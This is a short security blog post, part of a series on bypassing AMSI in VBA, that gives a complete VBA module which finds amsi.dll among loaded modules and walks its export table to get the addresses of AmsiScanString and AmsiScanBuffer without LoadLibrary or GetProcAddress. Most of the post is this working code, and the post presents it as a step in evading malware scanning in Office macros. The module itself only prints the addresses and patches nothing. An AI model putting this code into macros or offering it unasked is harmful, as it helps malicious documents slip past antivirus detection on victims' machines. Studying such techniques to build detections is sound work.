I’ve written a few posts recently which are all about AMSI and VBA and have hopefully shown that bypassing it is pretty trivial and can be done in a number of different ways. I just wanted to document one more combination of techniques that can be used to get the addresses of AmsiScanString and AmsiScanBuffer without calling LoadLibrary or GetProcAddress.

We can use EnumProcessModules to retrieve a handle for each module in a specified process.

We can then use GetModuleBaseName on each handle to check whether it belongs to amsi.dll, which is the one we’re on the hunt for (compare case-insensitively, as the base name may come back as either amsi.dll or AMSI.DLL).

If we establish we have the handle for amsi.dll we can then use GetModuleInformation to get the BaseAddress of amsi.dll in memory.

Once we have the DLL base address we can walk its export table using the same static PE header offsets as in the earlier posts on PEB walking and walking half the PEB, which gives us the two function addresses.
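The whole chain in one VBA module, as an added example written for this post rather than the code in the repo linked below. It assumes VBA7 (the PtrSafe declares), that amsi.dll is already mapped into the current process, and it uses the documented PE layout: e_lfanew at 0x3C, the export data directory at 0x70 into the 64-bit optional header (0x60 on 32-bit), and the IMAGE_EXPORT_DIRECTORY field offsets. The MODULEINFO type and the hypothetical helper names GetExportAddress, ReadAsciiZ and FindAmsiExports are mine.

```vba
Option Explicit

' Layout of the MODULEINFO structure filled in by GetModuleInformation
Private Type MODULEINFO
    lpBaseOfDll As LongPtr
    SizeOfImage As Long
    EntryPoint As LongPtr
End Type

Private Declare PtrSafe Function GetCurrentProcess Lib "kernel32" () As LongPtr
Private Declare PtrSafe Function EnumProcessModules Lib "psapi.dll" (ByVal hProcess As LongPtr, ByRef lphModule As LongPtr, ByVal cb As Long, ByRef lpcbNeeded As Long) As Long
Private Declare PtrSafe Function GetModuleBaseNameA Lib "psapi.dll" (ByVal hProcess As LongPtr, ByVal hModule As LongPtr, ByVal lpBaseName As String, ByVal nSize As Long) As Long
Private Declare PtrSafe Function GetModuleInformation Lib "psapi.dll" (ByVal hProcess As LongPtr, ByVal hModule As LongPtr, ByRef lpmodinfo As MODULEINFO, ByVal cb As Long) As Long
Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Destination As Any, Source As Any, ByVal Length As LongPtr)

' Read a NUL-terminated ANSI string out of our own address space
Private Function ReadAsciiZ(ByVal pStr As LongPtr) As String
    Dim b As Byte, s As String
    Do
        RtlMoveMemory b, ByVal pStr, 1
        If b = 0 Then Exit Do
        s = s & Chr$(b)
        pStr = pStr + 1
    Loop
    ReadAsciiZ = s
End Function

' Walk the export table of a module already loaded in this process and
' return the address of a named export, or 0 if it is not exported by name
Private Function GetExportAddress(ByVal hBase As LongPtr, ByVal sName As String) As LongPtr
    Dim e_lfanew As Long, expRva As Long
    Dim numNames As Long, funcsRva As Long, namesRva As Long, ordsRva As Long
    Dim i As Long, nameRva As Long, ordIdx As Integer, funcRva As Long

    ' IMAGE_DOS_HEADER.e_lfanew -> offset of IMAGE_NT_HEADERS
    RtlMoveMemory e_lfanew, ByVal hBase + &H3C, 4
    ' Optional header starts 0x18 past the NT signature; the export
    ' DataDirectory entry is 0x70 into it for PE32+ and 0x60 for PE32
    #If Win64 Then
        RtlMoveMemory expRva, ByVal hBase + e_lfanew + &H18 + &H70, 4
    #Else
        RtlMoveMemory expRva, ByVal hBase + e_lfanew + &H18 + &H60, 4
    #End If
    If expRva = 0 Then Exit Function

    ' IMAGE_EXPORT_DIRECTORY: NumberOfNames, AddressOfFunctions,
    ' AddressOfNames, AddressOfNameOrdinals
    RtlMoveMemory numNames, ByVal hBase + expRva + &H18, 4
    RtlMoveMemory funcsRva, ByVal hBase + expRva + &H1C, 4
    RtlMoveMemory namesRva, ByVal hBase + expRva + &H20, 4
    RtlMoveMemory ordsRva, ByVal hBase + expRva + &H24, 4

    For i = 0 To numNames - 1
        RtlMoveMemory nameRva, ByVal hBase + namesRva + i * 4, 4
        If ReadAsciiZ(hBase + nameRva) = sName Then
            ' Name index -> ordinal index (16-bit) -> function RVA
            RtlMoveMemory ordIdx, ByVal hBase + ordsRva + i * 2, 2
            RtlMoveMemory funcRva, ByVal hBase + funcsRva + (ordIdx And &HFFFF&) * 4, 4
            GetExportAddress = hBase + funcRva
            Exit Function
        End If
    Next i
End Function

' Enumerate loaded modules, find amsi.dll, and resolve both scan exports
' without LoadLibrary/GetProcAddress. Returns True only if both were found.
Public Function FindAmsiExports() As Boolean
    Dim hProc As LongPtr, hMods(0 To 1023) As LongPtr
    Dim cbNeeded As Long, i As Long, sMod As String
    Dim mi As MODULEINFO, pScanString As LongPtr, pScanBuffer As LongPtr

    hProc = GetCurrentProcess()
    If EnumProcessModules(hProc, hMods(0), 1024 * LenB(hMods(0)), cbNeeded) = 0 Then Exit Function

    For i = 0 To (cbNeeded \ LenB(hMods(0))) - 1
        sMod = String$(260, vbNullChar)
        sMod = Left$(sMod, GetModuleBaseNameA(hProc, hMods(i), sMod, Len(sMod)))
        If LCase$(sMod) = "amsi.dll" Then
            If GetModuleInformation(hProc, hMods(i), mi, LenB(mi)) <> 0 Then
                pScanString = GetExportAddress(mi.lpBaseOfDll, "AmsiScanString")
                pScanBuffer = GetExportAddress(mi.lpBaseOfDll, "AmsiScanBuffer")
                Debug.Print "amsi.dll base:  0x" & Hex$(mi.lpBaseOfDll)
                Debug.Print "AmsiScanString: 0x" & Hex$(pScanString)
                Debug.Print "AmsiScanBuffer: 0x" & Hex$(pScanBuffer)
                FindAmsiExports = (pScanString <> 0 And pScanBuffer <> 0)
            End If
            Exit For
        End If
    Next i
End Function
```

EnumProcessModules only lists modules that are already mapped into the process, so on an Office build that never loads amsi.dll the loop finds nothing and FindAmsiExports returns False instead of an address; check the return value before doing anything with the pointers.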

Code is on my Git
https://github.com/rmdavy/enumprocmodules
